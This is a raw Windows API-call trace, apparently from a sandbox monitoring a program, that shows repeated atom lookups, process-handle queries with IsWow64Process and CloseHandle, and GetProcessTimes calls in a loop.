	[0120.429] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0120.429] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0120.429] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0120.429] CloseHandle (hObject=0x698) returned 1
	[0120.429] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0120.429] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.430] CloseHandle (hObject=0x698) returned 1
	[0120.430] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.430] CloseHandle (hObject=0x698) returned 1
	[0120.430] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.430] CloseHandle (hObject=0x698) returned 1
	[0120.430] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.430] CloseHandle (hObject=0x698) returned 1
	[0120.463] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.463] CloseHandle (hObject=0x698) returned 1
	[0120.463] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.463] CloseHandle (hObject=0x698) returned 1
	[0120.463] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.463] CloseHandle (hObject=0x698) returned 1
	[0120.463] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.463] CloseHandle (hObject=0x698) returned 1
	[0120.464] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.464] CloseHandle (hObject=0x698) returned 1
	[0120.464] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.464] CloseHandle (hObject=0x698) returned 1
	[0120.464] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.464] CloseHandle (hObject=0x698) returned 1
	[0120.464] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.464] CloseHandle (hObject=0x698) returned 1
	[0120.464] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.464] CloseHandle (hObject=0x698) returned 1
	[0120.465] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.465] CloseHandle (hObject=0x698) returned 1
	[0120.465] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.465] CloseHandle (hObject=0x698) returned 1
	[0120.465] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.465] CloseHandle (hObject=0x698) returned 1
	[0120.465] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.465] CloseHandle (hObject=0x698) returned 1
	[0120.465] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.465] CloseHandle (hObject=0x698) returned 1
	[0120.465] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.465] CloseHandle (hObject=0x698) returned 1
	[0120.466] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.466] CloseHandle (hObject=0x698) returned 1
	[0120.466] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.466] CloseHandle (hObject=0x698) returned 1
	[0120.466] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.466] CloseHandle (hObject=0x698) returned 1
	[0120.466] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.466] CloseHandle (hObject=0x698) returned 1
	[0120.466] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.466] CloseHandle (hObject=0x698) returned 1
	[0120.467] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.467] CloseHandle (hObject=0x698) returned 1
	[0120.467] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.467] CloseHandle (hObject=0x698) returned 1
	[0120.467] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.467] CloseHandle (hObject=0x698) returned 1
	[0120.467] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.467] CloseHandle (hObject=0x698) returned 1
	[0120.467] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.467] CloseHandle (hObject=0x698) returned 1
	[0120.468] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.468] CloseHandle (hObject=0x698) returned 1
	[0120.468] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.468] CloseHandle (hObject=0x698) returned 1
	[0120.468] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.468] CloseHandle (hObject=0x698) returned 1
	[0120.468] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.468] CloseHandle (hObject=0x698) returned 1
	[0120.468] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.468] CloseHandle (hObject=0x698) returned 1
	[0120.468] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.469] CloseHandle (hObject=0x698) returned 1
	[0120.469] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0120.469] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0120.469] GetProcessTimes (in: hProcess=0x698, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0120.470] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0120.470] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0120.470] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0120.470] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0120.470] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0120.470] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0120.470] CloseHandle (hObject=0x698) returned 1
	[0120.470] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0120.471] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.471] CloseHandle (hObject=0x698) returned 1
	[0120.471] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.471] CloseHandle (hObject=0x698) returned 1
	[0120.471] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.471] CloseHandle (hObject=0x698) returned 1
	[0120.472] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.472] CloseHandle (hObject=0x698) returned 1
	[0120.504] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.504] CloseHandle (hObject=0x698) returned 1
	[0120.504] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.505] CloseHandle (hObject=0x698) returned 1
	[0120.505] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.505] CloseHandle (hObject=0x698) returned 1
	[0120.505] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.505] CloseHandle (hObject=0x698) returned 1
	[0120.505] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.505] CloseHandle (hObject=0x698) returned 1
	[0120.505] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.505] CloseHandle (hObject=0x698) returned 1
	[0120.505] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.506] CloseHandle (hObject=0x698) returned 1
	[0120.506] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.506] CloseHandle (hObject=0x698) returned 1
	[0120.506] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.506] CloseHandle (hObject=0x698) returned 1
	[0120.506] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.506] CloseHandle (hObject=0x698) returned 1
	[0120.506] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.506] CloseHandle (hObject=0x698) returned 1
	[0120.506] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.507] CloseHandle (hObject=0x698) returned 1
	[0120.507] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.507] CloseHandle (hObject=0x698) returned 1
	[0120.507] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.507] CloseHandle (hObject=0x698) returned 1
	[0120.507] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.507] CloseHandle (hObject=0x698) returned 1
	[0120.507] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.507] CloseHandle (hObject=0x698) returned 1
	[0120.507] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.508] CloseHandle (hObject=0x698) returned 1
	[0120.508] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.508] CloseHandle (hObject=0x698) returned 1
	[0120.508] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.508] CloseHandle (hObject=0x698) returned 1
	[0120.508] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.508] CloseHandle (hObject=0x698) returned 1
	[0120.508] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.508] CloseHandle (hObject=0x698) returned 1
	[0120.508] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.508] CloseHandle (hObject=0x698) returned 1
	[0120.509] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.509] CloseHandle (hObject=0x698) returned 1
	[0120.509] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.509] CloseHandle (hObject=0x698) returned 1
	[0120.509] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.509] CloseHandle (hObject=0x698) returned 1
	[0120.509] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.509] CloseHandle (hObject=0x698) returned 1
	[0120.509] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.509] CloseHandle (hObject=0x698) returned 1
	[0120.509] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.510] CloseHandle (hObject=0x698) returned 1
	[0120.510] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.510] CloseHandle (hObject=0x698) returned 1
	[0120.510] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.510] CloseHandle (hObject=0x698) returned 1
	[0120.510] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.510] CloseHandle (hObject=0x698) returned 1
	[0120.510] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0120.511] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0120.511] GetProcessTimes (in: hProcess=0x698, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0120.511] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0120.511] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0120.511] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0120.511] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0120.512] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0120.512] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0120.512] CloseHandle (hObject=0x698) returned 1
	[0120.512] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0120.512] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.512] CloseHandle (hObject=0x698) returned 1
	[0120.512] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.512] CloseHandle (hObject=0x698) returned 1
	[0120.513] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.513] CloseHandle (hObject=0x698) returned 1
	[0120.513] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.513] CloseHandle (hObject=0x698) returned 1
	[0120.592] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.592] CloseHandle (hObject=0x698) returned 1
	[0120.592] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.592] CloseHandle (hObject=0x698) returned 1
	[0120.592] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.592] CloseHandle (hObject=0x698) returned 1
	[0120.593] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.593] CloseHandle (hObject=0x698) returned 1
	[0120.593] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.593] CloseHandle (hObject=0x698) returned 1
	[0120.593] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.593] CloseHandle (hObject=0x698) returned 1
	[0120.593] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.593] CloseHandle (hObject=0x698) returned 1
	[0120.593] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.594] CloseHandle (hObject=0x698) returned 1
	[0120.594] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.594] CloseHandle (hObject=0x698) returned 1
	[0120.594] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.594] CloseHandle (hObject=0x698) returned 1
	[0120.594] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.594] CloseHandle (hObject=0x698) returned 1
	[0120.594] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.594] CloseHandle (hObject=0x698) returned 1
	[0120.594] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.594] CloseHandle (hObject=0x698) returned 1
	[0120.595] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.595] CloseHandle (hObject=0x698) returned 1
	[0120.595] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.595] CloseHandle (hObject=0x698) returned 1
	[0120.595] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.595] CloseHandle (hObject=0x698) returned 1
	[0120.595] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.595] CloseHandle (hObject=0x698) returned 1
	[0120.595] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.596] CloseHandle (hObject=0x698) returned 1
	[0120.596] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.596] CloseHandle (hObject=0x698) returned 1
	[0120.596] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.596] CloseHandle (hObject=0x698) returned 1
	[0120.596] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.596] CloseHandle (hObject=0x698) returned 1
	[0120.597] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.597] CloseHandle (hObject=0x698) returned 1
	[0120.597] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.597] CloseHandle (hObject=0x698) returned 1
	[0120.597] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.597] CloseHandle (hObject=0x698) returned 1
	[0120.597] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.597] CloseHandle (hObject=0x698) returned 1
	[0120.597] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.597] CloseHandle (hObject=0x698) returned 1
	[0120.598] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.598] CloseHandle (hObject=0x698) returned 1
	[0120.598] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.598] CloseHandle (hObject=0x698) returned 1
	[0120.598] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.598] CloseHandle (hObject=0x698) returned 1
	[0120.598] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.598] CloseHandle (hObject=0x698) returned 1
	[0120.598] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.598] CloseHandle (hObject=0x698) returned 1
	[0120.599] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0120.599] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0120.599] GetProcessTimes (in: hProcess=0x698, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0120.599] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0120.599] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0120.600] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0120.600] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0120.600] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0120.600] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0120.600] CloseHandle (hObject=0x698) returned 1
	[0120.600] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0120.600] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.600] CloseHandle (hObject=0x698) returned 1
	[0120.600] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.601] CloseHandle (hObject=0x698) returned 1
	[0120.601] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.601] CloseHandle (hObject=0x698) returned 1
	[0120.601] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.601] CloseHandle (hObject=0x698) returned 1
	[0120.811] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.811] CloseHandle (hObject=0x698) returned 1
	[0120.811] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.811] CloseHandle (hObject=0x698) returned 1
	[0120.811] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.811] CloseHandle (hObject=0x698) returned 1
	[0120.811] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.811] CloseHandle (hObject=0x698) returned 1
	[0120.811] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.812] CloseHandle (hObject=0x698) returned 1
	[0120.812] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.812] CloseHandle (hObject=0x698) returned 1
	[0120.812] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.812] CloseHandle (hObject=0x698) returned 1
	[0120.812] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.812] CloseHandle (hObject=0x698) returned 1
	[0120.812] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.812] CloseHandle (hObject=0x698) returned 1
	[0120.813] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.813] CloseHandle (hObject=0x698) returned 1
	[0120.813] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.813] CloseHandle (hObject=0x698) returned 1
	[0120.813] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.814] CloseHandle (hObject=0x698) returned 1
	[0120.814] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.814] CloseHandle (hObject=0x698) returned 1
	[0120.814] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.814] CloseHandle (hObject=0x698) returned 1
	[0120.814] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.814] CloseHandle (hObject=0x698) returned 1
	[0120.815] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.815] CloseHandle (hObject=0x698) returned 1
	[0120.815] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.815] CloseHandle (hObject=0x698) returned 1
	[0120.815] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.815] CloseHandle (hObject=0x698) returned 1
	[0120.815] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.815] CloseHandle (hObject=0x698) returned 1
	[0120.816] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.816] CloseHandle (hObject=0x698) returned 1
	[0120.816] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.816] CloseHandle (hObject=0x698) returned 1
	[0120.816] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.816] CloseHandle (hObject=0x698) returned 1
	[0120.816] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.816] CloseHandle (hObject=0x698) returned 1
	[0120.816] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.816] CloseHandle (hObject=0x698) returned 1
	[0120.817] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.817] CloseHandle (hObject=0x698) returned 1
	[0120.817] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.817] CloseHandle (hObject=0x698) returned 1
	[0120.817] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.817] CloseHandle (hObject=0x698) returned 1
	[0120.817] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.817] CloseHandle (hObject=0x698) returned 1
	[0120.818] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.818] CloseHandle (hObject=0x698) returned 1
	[0120.818] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.818] CloseHandle (hObject=0x698) returned 1
	[0120.818] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.818] CloseHandle (hObject=0x698) returned 1
	[0120.818] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0120.819] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0120.819] GetProcessTimes (in: hProcess=0x698, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0120.819] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0120.819] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0120.820] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0120.820] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0120.820] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
